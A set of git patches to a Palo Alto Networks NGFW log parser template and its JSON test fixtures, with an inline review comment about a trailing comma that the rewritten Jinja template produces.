diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 2f58900ab..4657c725b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index 9a1d42f34..b22a31f88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index ea53d3353..9f659a601 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "auth"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index dee27d0e1..d2477e4f1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
@@ -30,14 +30,7 @@
 "serial_number": "01545100000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "0",
- "Threat_ContentType": "login",
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1"
+ "Threat_ContentType": "login"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index 23d0aaaf8..a3738eaf2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index c3b8bcffc..42b530f45 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "fb"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 57cb1121b..4e097a01e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
@@ -59,16 +59,9 @@
 "serial_number": "016401004874"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url",
- "VirtualLocation": "vsys",
- "VirtualSystemName": "VSYS",
 "threat": {
- "id": "9999",
- "type": "URL filtering log"
+ "id": "9999"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index afc856776..207cd20b3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
@@ -72,24 +72,6 @@
 },
 "paloalto": {
 "DirectionOfAttack": "server to client",
- "PanOSContainerNameSpace": "pns_default",
- "PanOSDestinationDeviceCategory": "X-Phone",
- "PanOSDestinationDeviceHost": "pan-622",
- "PanOSDestinationDeviceMac": "620797415366",
- "PanOSDestinationDeviceModel": "MI",
- "PanOSDestinationDeviceOSFamily": "A1",
- "PanOSDestinationDeviceOSVersion": "Android v9.1",
- "PanOSDestinationDeviceProfile": "x-profile",
- "PanOSDestinationDeviceVendor": "Xiaomi",
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "PanOSSourceDeviceHost": "pan-505",
- "PanOSSourceDeviceModel": "Note 4G",
- "PanOSSourceDeviceProfile": "x-profile",
- "PanOSSourceDeviceVendor": "Lenovo",
- "PanOSSourceLocation": "LY",
- "PanOSThreatCategory": "unknown",
- "PanOSThreatID": "27379(27379)",
- "VirtualLocation": "vsys1",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index 20a78b306..cff329e0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
@@ -51,16 +51,10 @@
 "serial_number": "001701000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys",
 "threat": {
 "id": "34805",
- "name": "PDF Exploit Evasion Found",
- "type": "vulnerability exploit detection"
+ "name": "PDF Exploit Evasion Found"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index 4fd068d08..b74fdb564 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
@@ -72,12 +72,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
- "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
- },
 "related": {
 "hosts": [
 "LF-5698-NR"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
index a892a2a7b..1469faf57 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
@@ -72,12 +72,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
- "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
- "URLCategory": "low-risk",
- "VirtualLocation": "vsys1"
- },
 "related": {
 "hosts": [
 "GP cloud service"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
index 58c77fa30..9bf8bd0de 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
@@ -78,29 +78,6 @@
 "version": "2.0"
 },
 "paloalto": {
- "PanOSContainerName": "pan-dp-77754f4",
- "PanOSContainerNameSpace": "pns_default",
- "PanOSDestinationDeviceCategory": "N-Phone",
- "PanOSDestinationDeviceHost": "pan-355",
- "PanOSDestinationDeviceMac": "530589561221",
- "PanOSDestinationDeviceModel": "Nexus",
- "PanOSDestinationDeviceOSFamily": "H1511",
- "PanOSDestinationDeviceOSVersion": "Android v7",
- "PanOSDestinationDeviceProfile": "n-profile",
- "PanOSDestinationDeviceVendor": "Google",
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "PanOSGPHostID": "xxxxxxxxxxxxxx",
- "PanOSHASessionOwner": "session_owner-4",
- "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
- "PanOSSourceDeviceHost": "pan-301",
- "PanOSSourceDeviceModel": "Nexus",
- "PanOSSourceDeviceProfile": "n-profile",
- "PanOSSourceDeviceVendor": "Google",
- "PanOSSourceDynamicAddressGroup": "aqua_dag",
- "PanOSSourceLocation": "east-coast",
- "PanOSX-Forwarded-ForIP": "1.1.1.1",
- "URLCategory": "custom-category",
- "VirtualLocation": "vsys1",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
index 3445ddc4f..1621cfeed 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
@@ -49,8 +49,7 @@
 "serial_number": "026701002040"
 },
 "paloalto": {
- "Threat_ContentType": "end",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
index 3238eb5e4..324587ad2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
@@ -49,8 +49,7 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "deny", - "VirtualLocation": "vsys1" + "Threat_ContentType": "deny" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json index 41d495725..f3a6b58d6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json @@ -77,25 +77,6 @@ }, "paloalto": { "DirectionOfAttack": "server to client", - "PanOSContainerName": "pan-dp-77754f4", - "PanOSContainerNameSpace": "pns_default", - "PanOSDestinationDeviceCategory": "L-Phone", - "PanOSDestinationDeviceHost": "pan-506", - "PanOSDestinationDeviceMac": "150083646537", - "PanOSDestinationDeviceModel": "Note XT", - "PanOSDestinationDeviceOSFamily": "K8", - "PanOSDestinationDeviceOSVersion": "Android v8", - "PanOSDestinationDeviceProfile": "l-profile", - "PanOSDestinationDeviceVendor": "Lenovo", - "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", - "PanOSSourceDeviceHost": "pan-505", - "PanOSSourceDeviceModel": "Note 4G", - "PanOSSourceDeviceProfile": "l-profile", - "PanOSSourceDeviceVendor": "Lenovo", - "PanOSSourceDynamicAddressGroup": "blue_dag", - "PanOSSourceLocation": "west-coast", - "URLCategory": "sports", - "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json index c90ab6ed6..ea8e442b5 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/userid_cef.json @@ -53,10 +53,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "VirtualLocation": "vsys1", - "VirtualSystemID": "1" - }, "related": { "hosts": [ "PA-5220" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..8c7d37227 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -60,13 +60,8 @@ "serial_number": "111111111111" }, "paloalto": { - "DGHierarchyLevel1": "997", - "DGHierarchyLevel2": "738", - "DGHierarchyLevel3": "0", - "DGHierarchyLevel4": "0", "DirectionOfAttack": "server to client", "Threat_ContentType": "wildfire", - "VirtualLocation": "vsys1", "endpoint": { "serial_number": "xxxxxxxxxxx" }, From 9014eb71b8b40f8fcdab10798cefa107441f637f Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 16:39:58 +0200 Subject: [PATCH 190/317] Fix PaloAlto NGFW parser and tests --- .../paloalto-ngfw/ingest/parser.yml | 16 ++++++------- .../paloalto-ngfw/tests/User_id_1_csv.json | 9 +++++++- .../paloalto-ngfw/tests/User_id_2_csv.json | 9 +++++++- .../paloalto-ngfw/tests/auth_cef.json | 7 ++++++ .../paloalto-ngfw/tests/decryption_cef.json | 3 +++ .../paloalto-ngfw/tests/file_cef.json | 4 ++++ .../paloalto-ngfw/tests/fix_bug_with_int.json | 3 ++- .../tests/fix_bug_without_int.json | 3 ++- .../tests/globalprotect_cef.json | 1 + .../tests/globalprotect_csv.json | 2 ++ .../tests/globalprotect_csv_2.json | 2 ++ .../paloalto-ngfw/tests/hip_match_cef.json | 3 +++ .../paloalto-ngfw/tests/icmp_allow_csv.json | 3 ++- .../paloalto-ngfw/tests/iptag_cef.json | 4 ++++ .../tests/network_threat_alert_1.json | 8 ++++++- .../tests/network_threat_alert_2.json | 9 +++++++- .../paloalto-ngfw/tests/sctp_cef.json | 4 ++++ .../paloalto-ngfw/tests/system_csv.json | 5 ++++ .../paloalto-ngfw/tests/tcp_allow_csv.json | 3 ++- .../tests/test_cloud_election_json.json | 4 ++++ .../tests/test_dhcp_renew_json.json | 4 ++++ .../tests/test_dns_proxy_json.json | 4 ++++ .../tests/test_file_alert_json.json | 8 ++++++- .../tests/test_globalprotect.json | 2 ++ .../tests/test_installed_package_json.json | 4 ++++ .../tests/test_ldap_brute_force.json | 5 ++++ .../tests/test_new_file_type.json | 8 ++++++- .../tests/test_new_globalprotect.json | 5 ++++ .../tests/test_new_threat_type.json | 5 ++++ .../tests/test_new_url_type.json | 8 ++++++- .../tests/test_ntp_sync_json.json | 4 ++++ .../tests/test_port_up_json.json | 4 ++++ .../tests/test_registration_succeed_json.json | 4 ++++ .../paloalto-ngfw/tests/test_system.json | 5 ++++ .../tests/test_system_event_10_json.json | 4 ++++ .../tests/test_system_event_11_json.json | 4 ++++ .../tests/test_system_event_12_json.json | 4 ++++ .../tests/test_system_event_1_json.json | 4 ++++ .../tests/test_system_event_2_json.json | 4 
++++ .../tests/test_system_event_3_json.json | 4 ++++ .../tests/test_system_event_4_json.json | 4 ++++ .../tests/test_system_event_5_json.json | 4 ++++ .../tests/test_system_event_6_json.json | 4 ++++ .../tests/test_system_event_7_json.json | 4 ++++ .../tests/test_system_event_8_json.json | 4 ++++ .../tests/test_system_event_9_json.json | 4 ++++ .../paloalto-ngfw/tests/test_threat.json | 5 ++++ .../paloalto-ngfw/tests/test_threat_02.json | 5 ++++ .../tests/test_timestamp_palo.json | 5 ++++ .../tests/test_traffic_event_1_json.json | 8 ++++++- .../tests/test_traffic_event_2_json.json | 8 ++++++- .../tests/test_update_content_json.json | 4 ++++ .../tests/test_upgrade_package_json.json | 4 ++++ .../tests/test_user_authentication_json.json | 4 ++++ .../paloalto-ngfw/tests/test_userid.json | 9 +++++++- .../tests/test_web_authentication_json.json | 4 ++++ .../tests/test_wildfire_failure_json.json | 4 ++++ .../paloalto-ngfw/tests/threat-url-xff.json | 6 +++++ .../paloalto-ngfw/tests/threat_cef.json | 18 +++++++++++++++ .../paloalto-ngfw/tests/threat_csv.json | 5 ++++ .../paloalto-ngfw/tests/traffic1_csv.json | 6 +++++ .../paloalto-ngfw/tests/traffic2_csv.json | 6 +++++ .../paloalto-ngfw/tests/traffic_cef.json | 23 +++++++++++++++++++ .../tests/traffic_with_resotimestamp.json | 3 ++- .../paloalto-ngfw/tests/udp_deny_csv.json | 3 ++- .../paloalto-ngfw/tests/url_cef.json | 19 +++++++++++++++ .../paloalto-ngfw/tests/userid_cef.json | 4 ++++ .../paloalto-ngfw/tests/wildfire1_json.json | 5 ++++ 68 files changed, 353 insertions(+), 25 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 84ad45ff1..d82b5d2f1 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -715,16 +715,14 @@ stages: user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}" user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}" paloalto: >- - { - {% set ns = namespace(first_iteration=True) %} - {% for key, value in parsed_event.message.items() %} - {% if value not in ["null", "", None] %} - {% if not ns.first_iteration %},{% endif %} - {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}} - {% set ns.first_iteration = false %} - {% endif %} - {% endfor %} + { + {%- for key, value in parsed_event.message.items() -%} + {%- if value not in ["null", "", None] -%} + {{key|tojson}}: {{(value | replace('\x00', ''))|tojson}}, + {%- endif -%} + {%- endfor -%} } + paloalto.Threat_ContentType: "{{parsed_event.message.Subtype}}" paloalto.connection.stage: "{{parsed_event.message.Stage or parsed_event.message.PanOSStage}}" paloalto.authentication.method: "{{parsed_event.message.AuthMethod or parsed_event.message.PanOSAuthMethod}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json index dba765bd4..08c69d61f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json @@ -30,7 +30,14 @@ "serial_number": "016401002222" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json index 63c79e671..539963216 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json 
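Review bot: The rewritten `paloalto:` template emits a trailing comma after every kept entry, including the last one, so the rendered value ends in `, }` — a strict RFC 8259 parser rejects that, and preventing it was the whole purpose of the removed `ns.first_iteration` guard. The regenerated fixtures in this commit show the object being populated, so whatever parses this value evidently tolerates the trailing comma (a YAML flow mapping would), but the parser is then relying on lenient parsing of a hand-concatenated JSON string. A `loop.last` check would not fix it, because entries skipped by the `["null", "", None]` filter make the last iteration unreliable; building a dict and serialising it with `tojson` removes both the trailing comma and the string concatenation, as sketched below. Only the `paloalto:` value changes; `paloalto.Threat_ContentType` and the following mappings are unchanged.
```yaml
      paloalto: >-
        {%- set out = {} -%}
        {%- for key, value in parsed_event.message.items() -%}
        {%- if value not in ["null", "", None] -%}
        {%- set _ = out.update({key: (value | replace('\x00', ''))}) -%}
        {%- endif -%}
        {%- endfor -%}
        {{ out | tojson }}
      # … unchanged: paloalto.Threat_ContentType and the mappings that follow …
```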
@@ -30,7 +30,14 @@ "serial_number": "01640103000" }, "paloalto": { - "Threat_ContentType": "login" + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "0", + "Threat_ContentType": "login", + "VirtualLocation": "vsys", + "VirtualSystemID": "1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json index 1b4a52135..ff12d8db6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json @@ -57,6 +57,13 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSourceDeviceHost": "src_host_list-0", + "PanOSSourceDeviceModel": "src_model_list-1", + "PanOSSourceDeviceProfile": "src_profile_list-1", + "PanOSSourceDeviceVendor": "src_vendor_list-1", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "xxxxx" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json index e213912c2..1a4fba4b4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json @@ -61,6 +61,9 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1" + }, "related": { "ip": [ "1.1.1.1" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json index 965583ed3..2da36f33e 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json @@ -65,6 +65,10 @@ }, "paloalto": { "DirectionOfAttack": "client to server", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSSourceLocation": "1.1.1.1-1.1.1.1", + "URLCategory": "any", + "VirtualLocation": "smtp", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json index 4dadbb51b..512ae89e7 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json @@ -52,7 +52,8 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json index 4863396f8..add589697 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json @@ -52,7 +52,8 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end" + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json index 09505692f..4fd7b8802 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json @@ -42,6 +42,7 @@ "version": "2.0" }, "paloalto": { + "PanOSQuarantineReason": "Malicious Traffic", "authentication": { "method": "RADIUS" }, diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 0c72fdb63..65f2b6940 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -34,7 +34,9 @@ "serial_number": "ABCDEFG" }, "paloalto": { + "EventID": "gw-auth", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "login" } 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index 2f8cb93ae..e4b1d5fab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -34,7 +34,9 @@ "serial_number": "DFN3535D" }, "paloalto": { + "EventID": "gateway-config-release", "Threat_ContentType": "0", + "VirtualLocation": "vsys1", "connection": { "stage": "configuration" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json index 966ea0b88..6a0a99b82 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json @@ -40,6 +40,9 @@ "version": "2.0" }, "paloalto": { + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json index 6e8e88e79..e4e153224 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json @@ -49,7 +49,8 @@ "serial_number": "1801017000" }, "paloalto": { - "Threat_ContentType": "start" + "Threat_ContentType": "start", + "VirtualLocation": "vsys" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json index 4eef50d9d..9d2db872a 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json @@ -39,6 +39,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, "related": { "hosts": [ "PA-VM" 
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json index a6c93b2c4..d14918dab 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json @@ -58,8 +58,14 @@ "serial_number": "000011111112222" }, "paloalto": { + "DGHierarchyLevel1": "982", + "DGHierarchyLevel2": "117", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index 6fd2dbfa0..e8c257c69 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -63,8 +63,15 @@ "serial_number": "no-serial" }, "paloalto": { + "ContentType": "text/plain", + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "525", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", "DirectionOfAttack": "client to server", - "Threat_ContentType": "url" + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" }, "related": { "hosts": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json index ff9edc877..717e963a0 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json @@ -57,6 +57,10 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, + "paloalto": { + "PanOSSourceLocation": "US", + "VirtualLocation": "vsys1" + }, "related": { "hosts": [ "PA-5220" 
